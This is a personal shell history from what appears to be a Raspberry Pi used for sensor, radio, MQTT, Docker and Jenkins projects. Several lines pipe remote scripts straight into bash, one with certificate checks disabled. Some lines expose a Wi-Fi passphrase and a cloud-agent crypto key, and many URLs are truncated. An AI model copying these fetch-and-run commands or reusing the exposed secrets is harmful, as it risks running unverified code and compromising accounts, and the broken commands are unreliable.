+sudo python send.py +vi send.py +sudo python send.py +vi send.py +sudo python send.py +vi send.py +vi examples/recv.py +vi send.py +sudo python send.py +ls -altr +vi send.py +sudo python send.py +vi send.py +sudo python send.py +ls /dev +ls -altr +vi send.py +ls -altr +sudo python send.py +sudo shutdown -h 0 +ls -altr +ls +ls -altr +ls +ls -altr +cat send.py +sudo shutdown -h 0 +ls altr +ls -altr +ls +ls +cat send.py +sudo python +ls -altr +more send.py +sudo python +vi send.py +python +vi send.py +python +vi send.py +cat send.py +vi send.py +cat send.py +sudo python +vi send.py +sudo python +cat send.py +sudo python +vi send.py +ls +vi nrf24.py +cat send.py +import RPi.GPIO as GPIO +from nrf24 import NRF24 +import time,random +GPIO.setmode(GPIO.BOARD) +GPIO.cleanup() pipe=0x0101010101 +sudo python +ls +vi nrf24.py +ls /dev/spidev0.* +ls -altr /dev/spidev0.* +cat /dev/spidev0.0 +vi nrf24.py +vi send.py +cat send.py +import RPi.GPIO as GPIO +from nrf24 import NRF24 +import time,random +GPIO.setmode(GPIO.BOARD) +GPIO.cleanup() pipes = [[0x31, 0x31, 0x31, 0x31, 0x31], [0x32, 0x32, 0x32, 0x32, 0x32]] +pipe=0x0101010101 +radio = NRF24() +radio.begin(0, 0, 12, 26) +radio.setRetries(15,15) +radio.setPayloadSize(1) +#radio.setChannel(0x60) +#radio.setDataRate(NRF24.BR_250KBPS) +#radio.setPALevel(NRF24.PA_MAX) +radio.openWritingPipe(pipes[0]) +#radio.openReadingPipe(1, pipes[1]) +#radio.startListening() +#radio.stopListening() +radio.printDetails() +sudo python +sudo shutdown -h 0 +ls -atlr +ls +ls -altr +ls +ls -altr +ls +ls -altr +vi send.py +grep P9 * +vi README.md +cat send.py +sudo python +vi send.py +cat send.py +sudo python +ls -altr +ls +more HeAD +more HEAD +more index +more README.md +ls -altr +cp nrf24.py nrf24.py.orig +vi nrf24.py +vi send.py +cat send.py +sudo python +ls +vi nrf24.py +cat send.py +sudo python +ls +vi nrf24.py +vi nrf24.py.orig +vi nrf24.py +cat send.py +sudo python +vi nrf24.py +nrf24 +cat send.py +sudo python +vi nrf24.py +sudo python +vi send.py +sudo python +vi send.py +sudo python +vi send.py +sudo python +vi nrf24.py +sudo python +vi send.py +sudo python +shutdown -h 0 +sudo shutdown -h 0 +ls +ls -latr +ls -altr +vi send.py +cat send.py +sudo python +sudo shutdown -h 0 +ls +ls +vi send.py +cat send.py +sudo python +vi send.py +sudo python +vi send.py +cat send.py +from send import * +sudo python +ls -altr +vi nrf24.py +cat send.py +sudo python +vi send.py +cat send.py +sudo python +vi send.py +cat send.py +sudo python +cat send.py +vi send.py +sudo python +vi nrf24.py +sudo python +vi nrf24.py +sudo python +vi send.py +sudo python +vi send.py +cat send.py +sudo python +cat send.py +sudo python +vi send.py +cat send.py +sudo python +sudo shutdown -h 0 +ls -altr +sl +ls +s +ls +vi send.py +cat send.y +cat send.py +sudo python +ls -altr +cp send.py radio.py +vi radio.py +cat radio.py +sudo python +ls -altr +vi radio.py +cat radio.py +sudo python +vi radio.py +cat radio.py +sudo python +ls +vi radio.py +ls +pwd +ls +git commit -a +git commit -a +ls +git add pynrf24/radio.py +git commit -a +git push +ls +ls +git add radio.py +git commit -a +git push +ls -altr +ls +ls +ls +cat master +ls +ls -altr +git push +sudo shutdown -h 0 +ls -altr +ls +ls -altr +cat radio.py +vi radio.py +sudo python +vi radio.py +ls -altr +cat radio.py +sudo python +vi radio.py +sudo python +git commit -a +git push +ls -altr +ftp raspi +sudo ftp +ls -altr +cat radio.py +more radio.py +ls +ls -altr +vi radio.py +vi nrf24.py +ls +sudo shutdown -h 0 +ls +ls +cat radio.py +sudo python +vi radio.py +sudo python +vi radio.py +sudo python +vi radio.py +sudo python +vi radio.py +sudo python +ls -altr +vi radio.py +sudo python +sudo shutdown -h 0 +apt-get update +vi /etc/hosts +sudo apt-get update && sudo apt-get install apt-transport-https +sudo apt-get install -y linux-image-extra-virtual +less /etc/apt/sources.list.d/docker.list +sudo apt-get update && sudo apt-get install docker-engine +sudo apt-get update && sudo apt-get upgrade docker-engine +docker run --rm -it --name ucp -v /var/run/docker.sock:/var/run/docker.sock docker/ucp join --admin-username admin --interactive --url +service docker stop +service docker start +iptables -L +mkdir ucp +mv /tmp/ucp-bundle-admin.zip . +apt-get install -y unzip +unzip ucp-bundle-admin.zip +ll +source env.sh +docker ps +ip addr +ll +ll ucp/ +docker info +history | less +ll +source env.sh +history | less +docker info +apt-get install git +curl -Lse/releases/download/1.7.1/docker-compose-`uname -s`-`uname -m` > /usr/local/bin/docker-compose +chmod +x /usr/local/bin/docker-compose +docker-compose up & +ifconfig +docker ps +docker stop $(docker ps -qa) +docker rm -f $(docker ps -qa) +vi /etc/hosts +grep -r cog /etc/hosts +docker ps +docker ps -a +docker run --rm -it --name ucp -v /var/run/docker.sock:/var/run/docker.sock docker/ucp join --admin-username admin --interactive --url +docker ps +ifconfig +whereis docker +PLATFORM=ec2 && curl -Lscalr.net/public/linux/latest/$PLATFORM/install_scalarizr.sh | sudo bash +scalarizr --import -y -o server-id=efc0f34c-2c4b-497b-a005-0dd5beffc431 -o role-name=DockerUCPn01 -o crypto-key=EzPrSTbZxN6usDX4q6BuwzKBkFFiKOdbCf1X9SYs -o platform=ec2 -o queryenv-urlssaging-p2p.producer-urlssaging -o env-id=1 -o region=us-east-1 -o scalr-id=dce49fa0 +sudo +ls-ltr +ls +pwd +ls -ltr +grep +grep --help +wget -q -O -s-ci.org/debian/jenkins-ci.org.key | sudo apt-key add - +sudo sh -c 'echo debs-ci.org/debian-stable binary/ > /etc/apt/sources.list.d/jenkins.list' +sudo apt-get update +sudo apt-get install jenkins +y +/etc/init.d/jenkins +start +/etc/init.d/jenkins start +/var/lib/jenkins/secrets/initialAdminPassword +/var/log/jenkins/jenkins.log +sudo /var/lib/jenkins/secrets/initialAdminPassword +/etc/default/jenkins +ls +ls -ltr +ls - ltr +ls -ltr +ls +JENKINS_HOME +sudo cd jenkins +chmod jenkins 777 +chmod help +chmod --help +vi host +ls -lrt +vi hosts +vi hostname + chefnode +/var/log/jenkins/jenkins.log +vi /var/log/jenkins/jenkins.log +vi /var/lib/jenkins/secrets/initialAdminPassword +vi hosts +vi hostname +ifconfig +sudo raspi-config +sudo nano /etc/network/interfaces +.. +suda +nano +sudo iwlist wlan0 scan +sudo nano /etc/wpa_supplicant/wpa_supplicant.conf +sudo reboot +time +date +time +sudo iwlist wlan0 scan +ifconfig +ifconfig wlan0 +ifconfig +sudo nano /etc/wpa_supplicant/wpa_supplicant.conf +sudo reboot +ifconfig +sudo reboot +ifconfig +sudo rasp-config +sudo raspi-config +ifconfig +ping google.com +ifconfig +sudo iwlist wlan0 scan +sudo nano /etc/wpa_supplicant/wpa_supplicant.conf +sudo nano /etc/network/interfaces +ifconfig +sudo nano /etc/wpa_supplicant/wpa_supplicant.conf +sudo reboot +ifconfig +sudo iwlist wlan0 scan +ifconfig +ping google.com +iwgetid +ifconfig +sudo apt-get update +sudo apt-get upgrade +ping google.com +ping yahoo.com +ping +ping +ping +pwd +pwd +clear +ls +ls -l +clear +ls -l +ls -l resolve.conf +ls -l host.conf +more host.conf +ls +ls -l +ls -la +clear +touch test.txt +ls +more test.txt +suda nano test.txt +ls +rm test.txt +ls +ls -la +cler +clear +man ls +man sudo +man clear +clear +man nao +man nano +ifconfig +sudo raspi config +sudo raspi-config +clear + +sudo nano /etc/wpa_supplicant/wpa_supplicant.conf +wpa_passphrase eduroam "jjn5kor@2005" +sudo nano /etc/wpa_supplicant/wpa_supplicant.conf +exit +sudo shutdown -h now +sudo nano /etc/wpa_supplicant/wpa_supplicant.conf +wpa_passphrase eduroam "jjn5kor@2005" +network={ +} +network={ +} +sudo nano /etc/wpa_supplicant/wpa_supplicant.conf +man shutdown +sudo shutdown -h now +ifconfig +ls +.. +ls +ls +sudo nano cmdline.txt +reboot +ifconfig +sudo raspi-config +sudo nano /etc/wpa_supplicant/wpa_supplicant.conf +ifconfig +ifconfig +sudo nano /etc/wpa_supplicant/wpa_supplicant.conf +ifconfig +reboot +ifconfig +ping google.com +sudo raspi-config +sudo nano /etc/network/interfaces +sudo iwlist wlam0 scan +sudo iwlist wlan0 scan +ifconfig +ping google.com +ifconfig +reboot +ifconfig +sudo nano /etc/wpa_supplicant/wpa_supplicant.conf +ifconfig +reboot +sudo nano /etc/wpa_supplicant/wpa_supplicant.conf +ifconfig +sudo iwlist wlan0 scan +sudo iwlist wlan0 scan +ifconfig +sudo nano /etc/wpa_supplicant/wpa_supplicant.conf +ifconfig +reboot +ls +iwgetid +sudo apt update +sudo apt upgrade +mkdir /home/pi/DI +ls +sudo git clone +sudo git clone +sudo apt install git +sudo git clone +ls +sudo chmod +x install.sh +sudo ./install.sh +sudo reboot +ifconfig +ping google.com +ifconfig +sudo i2cdetect -y 1 +apt install i2cdetect +sudo apt install i2cdetect +sudo i2cdetect -y 1 +sudo apt-get install i2cdetect +sudo i2cdetect -y 1 +sudo apt-get install i2c-tools +sudo i2cdetect -y 1 +curl -kL dexterindustries.com/update_grovepi | bash +sudo chmod +x firmware_update.sh +sudo ./firmware_update.sh +ls +nano firmware_update.sh +nano grovepi_firmware_update.sh +sudo ./firmware_update.sh +sudo apt-get install avrdude +sudo ./firmware_update.sh + +sudo ./firmware_update.sh +sudo chmod +x grovepi_firmware_update.sh +sudo ./grovepi_firmware_update.sh +sudo ./firmware_update.sh +sudo apt update +sudo reboot +ls +sudo chmod +x firmware_update.sh +sudo ./firmware_update.sh +avrdude +sudo i2cdetect -y 1 +sudo ./update_grovepi.sh +ls +ls +sudo git fetch origin +sudo git reset --hard +sudo git merge origin/master +sudo chmod +x firmware_update.sh +sudo ./firmware_update.sh +ls +ls +ls +gpio +sudo nano /etc/avrdude.conf +sudo apt-get install gpio +ls +sudo apt-get install gpio +sudo apt install gpio +sudo shutdown -now +sudo shutdown -h now +ls +ls +ls +ls +nano give_gps +nano grove_gps +nano temp.py +nano led_blinking.py +nano hello.py +python hello.py +sudo apt-get install build-essential python-dev python-distlib python-setuptools python-pip python-wheel libzmq-dev libgdal-dev +sudo reboot +ifconfig +ls +ls +nano grove_led_blink.py +python grove_led_blink.py +sudo apt-get install python3 +sudo apt-get install python-pip python3-pip +sudo pip3 install -U numpy +python grove_led_blink.py +nano grovepi.py +sudo pip3 install numpy +ls +ls +ls +ls +ls +ls +ls +ls +ls +ls +ls +ls +ls +ls +ls +ls +nano grove_pir_motion_sensor.py +python grove_led_blink.py +ls +python hello.py +ls +ls +ls +ls +python grove_led_blink.py +pip3 uninstall numpy +sudo pip3 uninstall numpy +sudo apt-get install python3-numpy +python grove_led_blink.py +ls +nano hello.py +import sys +import sys +sys.path.append("numpy_path") +nano hello.py +python hello.py +sudo apt install python3-pip +sudo python3 -m pip install numpy +nano hello.py +python hello.py +nano hello.py +python hello.py +nano hello.py +python hello.py +python3 +nano hello.py +python hello.py +ls +ls +ls +phton3 +python3 +python grove_led_blink.py +python +python3 grove_led_blink.py +sudo apt-get remove python --purge +python3 grove_led_blink.py +ls +nano grove_pir_motion_sensor.py +python3 grove_pir_motion_sensor.py +nano grove_pir_motion_sensor.py +python3 grove_pir_motion_sensor.py +python3 grove_led_blink.py +reboot +sudo reboot +ls +ls +ls +ls +python3 grove_led_blink.py +reboot +sudo reboot +python3 grove_led_blink.py +ls +ls +ls +ls +python3 grove_led_blink.py +ls +ls +ls +nano grove_pir_motion_sensor.py +nano grove_led_blink.py +ls +python3 grove_led_blink.py +ls +nano grove_pir_motion_sensor.py +python3 grove_pir_motion_sensor.py +python3 grove_led_blink.py +nano grove_pir_motion_sensor.py +ls +ls +nano grove_led_blink.py +ls +mkdir test +ls +nano sensorcheck.py +python sensorcheck.py +nano sensorcheck.py +python sensorcheck.py +python3 sensorcheck.py +nano sensorcheck.py +python3 sensorcheck.py +nano sensorcheck.py +python3 sensorcheck.py +nano sensorcheck.py +python3 sensorcheck.py +nano sensorcheck.py +python3 sensorcheck.py +nano sensorcheck.py +python3 sensorcheck.py +nano sensorcheck.py +python3 sensorcheck.py +nano sensorcheck.py +python3 sensorcheck.py +nano sensorcheck.py +python3 sensorcheck.py +nano sensorcheck.py +python3 sensorcheck.py +nano sensorcheck.py +python3 sensorcheck.py +ls +ls +python3 grove_pir_motion_sensor.py +mkdir LocalTest +sudo nano grove_pir_motion_sensor.py +python3 grove_pir_motion_sensor.py +python3 grove_led_blink.py +sudo shutdown -h now +ls +ls +nano grove_pir_motion_sensor.py +ls +ls +nano sensorcheck.py +python3 sensorcheck.py +ls +sudo python3 grove_pir_motion_sensor.py +sudo python3 grove_led_blink.py +nano grove_pir_motion_sensor.py +sudo python3 grove_pir_motion_sensor.py +nano grove_pir_motion_sensor.py +sudo nano grove_pir_motion_sensor.py +sudo python3 grove_pir_motion_sensor.py +sudo nano grove_pir_motion_sensor.py +sudo python3 grove_pir_motion_sensor.py +sudo nano grove_pir_motion_sensor.py +sudo python3 grove_pir_motion_sensor.py +sudo nano grove_pir_motion_sensor.py +sudo python3 grove_pir_motion_sensor.py +sudo nano grove_pir_motion_sensor.py +sudo python3 grove_pir_motion_sensor.py +sudo nano grove_pir_motion_sensor.py +sudo python3 grove_pir_motion_sensor.py +sudo python3 grove_led_blink.py +sudo shutdown -h now +ls +sudo nano grove_pir_motion_sensor.py +sudo python3 grove_led_blink.py +sudo nano grove_pir_motion_sensor.py +sudo python3 grove_pir_motion_sensor.py +sudo python3 grove_led_blink.py +sudo reboot +sudp i2cdetect´-y 1 +sudo i2cdetect´-y 1 +sudo i2cdetect -y 1 +ls +sudo nano grove_light_sensor.py +sudo python3 grove_light_sensor.py +sudo i2cdetect -y 1 +sudo curl -kL +sudo curl -kL dexterindustries.com/update_grovepi | bash +sudo i2cdetect -y 1 +ls +sudo python3 grove_light_sensor.py +sudo i2cdetect -y 1 +sudo nano grove_light_sensor.py +sudo i2cdetect -y 1 +sudo apt-get upgrade +sudo apt-get update +sudo i2cdetect -y 1 +ls +sudo ./firmware_update.sh +sudo i2cdetect -y 1 +import grovepi +sudo i2cdetect -y 1 +sudo shutdown -h now +ls +ls +ls +ls +ls +nano grove_dht_example1.py +ifconfig +ls +ls +ls +ls +sudo i2cdetect -y 1 +sudo python3 grove_pir_motion_sensor.py +sudo nano grove_temperature_sensor.py +ls +sudo nano grove_dht_pro.py +sudo nano grove_dht_pro_filter +ls +ls +sudo nano grove_dht_example1.py +sudo nano grove_dht_example2.py +sudo nano grove_dht.py +sudo nano grove_dht_example2.py +sudo nano grove_dht_example3.py +sudo python3 grove_dht_example2.py +sudo python3 grove_dht_example1.py +ls +sudo python3 grove_dht_pro.py +sudo nano grove_dht_pro.py +sudo python3 grove_dht_pro.py +sudo nano grove_dht_pro.py +sudo shutdown-h now +sudo shutdown -h now +setuptools +git +python3-dev +python3 -dev +sudo apt-get install setuptools +sudo apt-get install build-essential python3-dev python3-setuptools +ls +mkdir Plugwise +git clones/python +git clones/python-plugwise +ls +ls +sudo python3 setup.py +sudo python3 setup.py install +ls +ls +sudo python3 setup.py install +./dev/ttyUSB0 +plugwise_util -m 000D5F000278F2F3 -p +plugwise_util -m 000D5F000278F2F3 -s 1 +plugwise_util -m 000D5F000278F2F3 -s 0 +plugwise_util -m 000D5F000278F2F3 -p +ls +ls +plugwise_util -m 000D5F000278F2F3 -s 0 +plugwise_util -m 000D5F000278F2F3 -p +sudo nano plugwise_util +plugwise_util -m 000D6F000278F2F3 -p +plugwise_util -m 000D6F000278F2F3 -s 0 +plugwise_util -m 000D6F000278F2F3 -s 1 +plugwise_util -m 000D6F0002C0EB54 -p +plugwise_util -m 000D6F0002C0EB54 -s 1 +plugwise_util -m 000D6F0002C0EB54 -s 0 +plugwise_util -m 000D6F0002C0EB54 -s 1 +plugwise_util -m 000D6F0002C0EB54 -p +plugwise_util -m 000D6F0002C0EB54 -s 0 +plugwise_util -m 000D6F000278F2F3 -s 0 +sudo shutdown -h now +ls +ls +ls +sudo nano pir.py +sudo nano dht.py +sudo nano lightsensor.py.py +sudo nano lightsensor.py +sudo nano pir.py +sudo nano lightsensor.py +ls +sudo nano SC_main.py +sudo python3 SC_main.py +sudo nano SC_main.py +sudo nano lightsensor.py +sudo python3 SC_main.py +sudo nano lightsensor.py +sudo nano SC_main.py +sudo python3 SC_main.py +sudo nano SC_main.py +sudo python3 SC_main.py +sudo nano SC_main.py +sudo nano lightsensor.py +sudo python3 SC_main.py +sudo nano lightsensor.py +sudo nano SC_main.py +sudo python3 SC_main.py +sudo nano SC_main.py +sudo python3 SC_main.py +sudo nano SC_main.py +sudo python3 SC_main.py +sudo nano pir.py +sudo nano SC_main.py +sudo python3 SC_main.py +sudo nano SC_main.py +sudo python3 SC_main.py +sudo nano SC_main.py +sudo python3 SC_main.py +sudo nano SC_main.py +sudo python3 SC_main.py +sudo nano SC_main.py +sudo python3 SC_main.py +sudo nano SC_main.py +sudo python3 SC_main.py +sudo i2cdetect -y 1 +reboot +sudo reboot +ls +ls +sudo nano sensorcheck.py +sudo python3 sensorcheck.py +sys +sys.path +os.sys.path +python3 +ls +ls +sudo nano grovepi.py +python3 +ls +sudo python3 sensorcheck.py +sudo nano sensorcheck.py +sudo python3 sensorcheck.py +sudo nano sensorcheck.py +sudo python3 sensorcheck.py +sudo nano sensorcheck.py +sudo python3 sensorcheck.py +sudo nano sensorcheck.py +sudo python3 sensorcheck.py +sudo nano sensorcheck.py +sudo python3 sensorcheck.py +ls +ls +plugwise_util -m 000D6F000278F2F3 -s 0 +plugwise_util -m 000D6F000278F2F3 -s 1 +plugwise_util -m 000D6F000278F2F3 -p +plugwise_util -m 000D6F000278F2F3 -s 0 +ls +ls +sudo nano api.py +python3 +ls +sudo nano hello.py +rmv +rm hello.py +ls +mkdir SmartCities +mkdir InputDrivers +sudo nano lightsensor +ls +sudo nano lightsensor.py +ls +sudo nano dht +sudo nano dht.py +ld +ls +sudo nano pir.py +ls +~ls +clear +ls +ls +nano grove_pir_motion_sensor.py +ls +nano grove_dht_example2.py +nano sensorcheck.py +ls +ls +nano grove_dht_example2 +nano grove_dht_example2.py +nano grove_light_sensor.py +ls +ls +ls +sudo nano pir.py +sudo nano lightsensor.py +sudo nano pir.py +ls +sudo nano grove_motion_sensor.py +ls +sudo nano grove_pir_motion_sensor.py +sudo nano grove_light_sensor.py +ipconfig +ifconfig +ls +ls +ls +ls +sudo nano wpa_supplicant.conf +ls +ls +sudo nano interfaces +sudo nano wpa_supplicant.conf +ls +ls +sudo nano wpa_supplicant.conf +sudo reboot +ifconfig +sudo iwlist wlan0 scan +ls +sudo nano wpa_supplicant.conf +ls +ls +sudo nano interfaces +sudo iwlist wlan0 scan +sudo reboot +ifconfig +ls +pi +sudo shutdown -h now +ifconfig +sudo shutdown -h now +ls +ls +sudo nano interfaces +ls +sudo nano wpa_supplicant.conf +sudo reboot +ifconfig +ls +ls +ls +sudo nano SC_main.py +ls +sudo nano lightsensor.py +nano lightsensor.py +sudo nano lightsensor.py +cs.. +ls +lssudo nano lightsensor.py +sudo nano lightsensor.py +ls +sudo nano lightsensor.py +ls +sudo nano SC_main.py +ls +ls +ls +ls +ls +ls +sudo nano grove_dht_example2.py +ls +sudo nano grove_dht.pz +sudo nano grove_dht.py +ls +sudo nano grove_dht_example1.py +ls +ls +ls +sudo nano SC_main.py +sudo nano lightsensor.py +python3 +sudo nano lightsensor.py +ls +sudo nano lightsensor.py +python3 +sudo nano lightsensor.py +python3 +python3 lightsensor.py +python3 +sudo nano lightsensor.py +python3 +sudo nano lightsensor.py +python3 +sudo nano lightsensor.py +python3 +sudo nano SC_main.py +sudo nano lightsensor.py +sudo nano SC_main.py +python3 SC_main.py +ls +sudo nano lightsensor.py +python3 SC_main.py +sudo nano pir.py +sudo nano SC_main.py +python3 SC_main.py +sudo nano pir.py +sudo nano SC_main.py +sudo nano lightsensor.py +python3 SC_main.py +sudo nano pir.py +sudo nano SC_main.py +python3 SC_main.py +sudo nano SC_main.py +python3 SC_main.py +sudo nano SC_main.py +python3 SC_main.py +sudo nano SC_main.py +ls +ls +sudo nano grove_dht_example2.py +sudo nano SC_main.py +python3 SC_main.py +sudo nano dht.py +rmv dht.py +rm dht.py +ls +python3 SC_main.py +sudo i2cdetect -y 1 +sudo reboot +ifconfig +sudo i2cdetect -y 1 +python3 SC_main.py +python3 SC_main.py +sudo i2cdetect -y 1 +sudo reboot +ls +ls +ls +sudo nano grove_dht_example1. +python3 grove_dht_example1.py +sudo i2cdetect -y 1 +ls +ls +ls +ls +ls +sudo nano grove_dht_example1.py +ls +sudo nano grove_dht.py +ls +sudo nano grove_dht_example1.py +python3 grove_dht_example1.py +python3 SC_main.py +python3 SC_main.py +sudo nano SC_main.py +python3 SC_main.py +sudo nano SC_main.py +python3 SC_main.py +sudo i2cdetect -y 1 +sudo reboot +sudo i2cdetect -y 1 +python3 SC_main.py +sudo i2cdetect -y 1 +python3 SC_main.py +sudo i2cdetect -y 1 +python3 SC_main.py +sudo nano SC_main.py +sudo i2cdetect -y 1 +python3 SC_main.py +sudo nano SC_main.py +sudo i2cdetect -y 1 +python3 SC_main.py +sudo shutdown -h now +sudo i2cdetect -y 1 +python3 SC_main.py +python3 SC_main.py +python3 +python3 SC_main.py +sudo i2cdetect -y 1 +sudo nano SC_main.py +sudo i2cdetect -y 1 +sudo reboot +sudo i2cdetect -y 1 +python3 SC_main.py +python3 SC_main.py +sudo nano SC_main.py +sudo i2cdetect -y 1 +python3 SC_main.py +ls +sudo nano grove_dht +sudo nano grove_dht.py +sudo shutdown -h now +git clonese/paho.mqtt.python.git +ls +ls +python3 setup.py install +sudo python3 setup.py install +ls +sudo wgetsquitto.org/debian/mosquittorepo.gpg.key +sudo wgetsquitto.org/debian/mosquitto-repo.gpg.key +apt-get : sudo apt-key add mosquitto-repo.gpg.key +apt-get:sudo apt-key +sudo apt-key add mosquitto-repo.gpg.key +ls +sudo nano mosquitto-repo.gpg.key +ls +ls +ls +ls +sudo wgetsquitto.org/debian/mosquitto-stretch.list +ls +sudo apt-get install mosquito +sudo apt-get update +sudo apt-get install mosquito +ls +sudo apt-get install mosquito +mosquito +mosquitto +sudo apt-get install mosquitto +sudo apt-get install mosquitto-clients +mosquitto_sub d t 'sciot test' +mosquitto_sub -d -t 'sciot test' +mosquitto_sub -d -t 'sciot-test' +mosquitto_sub -d -t 'sciot' +ls +ls +ls +nano pir.py.save +sudo nano uv.py +sudo nano SC_main.py +sudo nano uv.py +python3 SC_main.py +sudo nano uv.py +sudo nano SC_main.py +sudo nano uv.py +python3 SC_main.py +sudo reboot +mosquitto_pub -d -t ‘sciot-test’ -m ‘Heyy Whats Up sudo shutdown -h now’ +mosquitto_pub -d -t ‘sciot-test’ -m ‘Heyy There mosquitto_pub -d -t ‘sciot-test’ -m ‘Heyy Whats Up sudo shutdown -h now’’ +clear +mosquitto_pub -d -t ‘sciot-test’ -m ‘Heyy Whats Up’ +mosquitto_pub -d -t ‘sciot-test’ -m ‘Heyy’ +mosquitto_pub -d -t ‘sciot-test’ -m ‘Heyy dfg’ +mosquitto_pub -d -t ‘sciot-test’ -m 'Heyy' +mosquitto_pub -d -t 'sciot' -m 'Heyy' +mosquitto_pub -d -t 'sciot' -m 'Heyy tehe' +mosquitto_pub -d -t 'sciot' -m 'Heyy there' +mosquitto_pub -d -t 'sciot' -m 'Heyy there!!!!!!' +mosquitto_pub -d -t 'sciot' -m 'Hey its Jerome' +mosquitto_pub +mosquitto_pub -d -t -r 'sciot' -m 'Hey its Jerome' +mosquitto_pub -d -t 'sciot' -m -r 'Hey its Jerome' +mosquitto_pub -d -t 'sciot' -m 'Hey its Jerome' -r +ls +ls +sudo nano SC_main.py +ls +ls +ls +ls +nano requirements.txt +mosquitto_sub -v -t "#" +mosquitto_sub +mosquitto +mosquitto_sub +mosquitto +mosquitto +mosquitto_sub +mosquitto_sub --help +mosquitto_sub -v -t "sciot" +clear +ls +ls +ls +sudo nano grove_ultrasonic.py +python3 grove_ultrasonic.py +ls +ls +nano lightsensor.py +nano uv.py +sudo nano uv.py +sudo nano SC_main.py +sudo nano uv.py +sudo nano SC_main.py +sudo nano uv.py +sudo i2cdetect -y 1 +mosquitto_sub -d -t 'sciot-test' -m 'Hello girl' +mosquitto_sub -d -t 'sciot' -m 'Hello girl' +mosquitto_pub -d -t 'sciot' -m 'Hello girl' +ls +nano grove_ultrasonic.py +ls +ls +ls +nano grove_ultrasonic.py +ls +nano lightsensor.py +nano pir.py +ls +sudo nano lightsensor.py +ls +ls +ls +ls +nano grove_ultrasonic.py +ls +ls +ls +python3 SC_main.py +sudo i2cdetect -y 1 +sudo reboot +nano SC_main.py +sudo nano SC_main.py +ls +ls +ls +sudo nano SC_main.py +python3 SC_main.py +sudo shutdown -h now +CD .. +snano uv.py +sudo nano SC_main.py +ls +python3 SC_main.py +sudo i2cdetect -y 1 +python3 SC_main.py +sudo python3 SC_main.py +sudo i2cdetect -y 1 +sudo reboot +ls +rm pir.py.save +ls +rm uv.py.save +ls +ls +ls +python3 SC_main.py +sudo i2cdetect -y 1 +sudo nano SC_main.py +sudo i2cdetect -y 1 +python3 SC_main.py +sudo reboot +sudo i2cdetect -y 1 +sudo python3 SC_main.py +sudo python3 SC_main.py +sudo i2cdetect -y 1 +sudo nano SC_main.py +sudo nano SC_main.py +python3 SC_main.py +sudo python3 SC_main.py +sudo nano SC_main.py +ls +sudo nano SC_main.py +sudo nano SC_main.py +sudo reboot +ls +ls +sudo nano test1.py +sudo nano test2.py +ls +ls +ls +ls +python3 grove_dht_example1.py +sudo i2cdetect -y 1 +python3 grove_dht_example1.py +ls +ls +sudo nano test1.py +sudo python3 test1.py +ls +ls +ls +sudo nano publish_single.py +sudo nano client_pub_opts.py +sudo nano publish_single.py +sudo nano client_pub-wait.py +clear +ls +sudo nano SC_main.py +sudo python3 SC_main.py +sudo nano SC_main.py +sudo python3 SC_main.py +sudo nano SC_main.py +sudo python3 SC_main.py +ls +sudo nano test2.py +sudo python3 test2.py +sudo nano test2.py +ls +ls +ls +sudo nano client_pub-wait.py +ls +ls +ls +sudo nano client_pub-wait.py +ls +sudo nano mosquitto-repo.gpg.key +ls +ls +sudo nano publish_single.py +ls +ls +sudo nano test_client.py +ls +sudo nano client_sub.py +pwd +ls +ls -l +ls +ls -l +chmod -r 777 test +chmod -R 777 test +sudo chmod -R 777 test +ls -l +ls +sudo nano test2.py +clear +sudo python3 test1.py +sudo nano test1.py +shutdown -h now +sudo shutdown -h now +ipconfig +ifconfig +shutdown -h now +sudo shutdown -h now +ls +sudo nano test2.py +python3 test2.py +clear +exit +ifconfig +exit +ls +c +ls +sudo nano PeopleCount.py +python3 PeopleCount.py +exit +ls +ls +sudo nano TemperatureHumidity.py +ls +python3 grove_dht_example2.py +python3 grove_dht_example1.py +python3 grove_dht_example3.py +ls +python3 test_Subscribe.py +exit +ls +python3 TemperatureHumidity.py +pkill -9 python +python3 TemperatureHumidity.py +pkill -9 python +python3 TemperatureHumidity.py +nano TemperatureHumidity.py +python3 TemperatureHumidity.py +pkill -9 python +ls +pkill -9 python3 +ls +sudo nano TempHum.py +python3 TempHum.py +sudo nano TempHum.py +python3 TempHum.py +pkill -9 python3 +sudo nano TempHum.py +python3 TempHum.py +pkill -9 python3 +pkill -9 python +python3 TempHum.py +pkill -9 python +pkill -9 python3 +python3 TempHum.py +pkill -9 python3 +pkill -9 python +python3 TempHum.py +pkill -9 python +python3 TempHum.py +pkill -9 python +pkill -9 python3 +ls +sudo nano TempHum.py +exit +ls +python3 PeopleCount.py +sudo nano PeopleCount.py +python3 PeopleCount.py +pkill -9 +python3 PeopleCount.py +sudo nano PeopleCount.py +sudo nano Combined.py +ls +sudo nano Combined.py +python3 Combined.py +sudo nano Combined.py +python3 Combined.py +sudo nano Combined.py +python3 Combined.py +sudo nano Combined.py +python3 Combined.py +sudo nano Combined.py +python3 Combined.py +sudo nano Combined.py +python3 Combined.py +sudo nano Combined.py +python3 Combined.py +sudo nano Combined.py +python3 Combined.py +sudo nano Combined.py +python3 Combined.py +sudo nano Combined.py +python3 Combined.py +sudo nano Combined.py +python3 Combined.py +pkill -9 +pkill -9 python +python3 Combined.py +sudo nano Combined.py +python3 Combined.py +sudo nano Combined.py +python3 Combined.py +pkill -9 python +python3 Combined.py +sudo nano Combined.py +python3 Combined.py +pkill -9 python +pkill -9 python3 +python3 Combined.py +pkill -9 python3 +pkill -9 python +i2cdetect -y 1 +exit +ls +sudo nano test_Subscribe.py +python3 test_Subscribe.py +sudo nano test_Subscribe.py +python3 test_Subscribe.py +pkill -9 +python3 test_Subscribe.py +pkill -9 python3 +pkill -9 python +python3 test_Subscribe.py +exit +sudo shutdown -h now +ls +sudo nano Combined.py +python3 Combined.py +pkill -9 python +pkill -9 python3 +exit +ls +python3 test_Subscribe.py +sudo shutdown -h now +ls +python3 test_schedule.py +sudo nano test_schedule.py +python3 test_schedule.py +pkill -9 python3 +ls +python3 test_schedule.py +python3 Combined.py +python3 Combined.py +exit +ls +python test_Subscribe.py +sudo nano test_Subscribe.py +python test_Subscribe.py +python3 test_Subscribe.py +sudo nano test_schedule.py +python3 test_Subscribe.py +pkill -9 python3 +pkill -9 python +python3 test_Subscribe.py +sudo shutdown -h now +ls +python3 PeopleCount.py +exit +pkill -9 python +exit +ls +python3 Combined.py +clear +ls +python3 test_schedule.py +python3 test_Publish.py +ls +python3 PeopleCount.py +python3 TempHum.py +python3 Combined.py +sudo shutdown -h now +ls +python3 test_Subscribe.py +clear +ls +python3 test_Subscribe.py +ls +python3 grove_buzzer.py +sudo nano grove_buzzer.py +python3 grove_buzzer.py +sudo shutdown -h now +ls +ls +python3 test_plugwise.py +ls +sudo nano 